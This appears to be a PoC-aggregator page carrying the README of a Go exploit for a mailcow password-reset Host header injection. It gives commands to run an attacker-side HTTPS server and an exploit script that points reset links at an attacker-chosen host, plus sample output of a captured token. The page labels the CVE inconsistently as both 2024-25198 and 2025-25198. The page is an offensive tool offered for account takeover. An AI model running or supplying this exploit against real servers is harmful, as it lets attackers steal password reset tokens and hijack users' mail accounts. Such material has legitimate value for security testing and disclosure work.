关联漏洞
Description
Captures password reset tokens from Mailcow Host header injection attacks.
介绍
# CVE-2024-25198
mailcow: dockerized is an open source groupware/email suite based on docker. Prior to version 2025-01a, a vulnerability in mailcow's password reset functionality allows an attacker to manipulate the `Host HTTP` header to generate a password reset link pointing to an attacker-controlled domain. This can lead to account takeover if a user clicks the poisoned link.
## How works?
Sets up an https server to hear al requests and sends a POST Request to the website with the Host header with your selected <IP>. You can also use Burpsuite to send the request and get the Token in the server.
## Features
- HTTPS server that retrieves the Password Change Token
- Exploit script that attacks the website vulnerability.
- Fixed Everything and no longer requires openssl to work
## Prerequisites
- Go 1.16 or higher
## Server Script
```bash
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server
```
## Exploit Script
```bash
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <user@email.com> --host <ip>:<port> <--insecure | optional >
```
After waiting a bit the server will output the token that you can use :
```
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
```
文件快照
[4.0K] /data/pocs/4a915987eaba4aa9effb16c7f177963129db0b2c
├── [3.4K] exploit.go
├── [1.0K] LICENSE
├── [1.3K] README.md
└── [5.6K] server.go
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。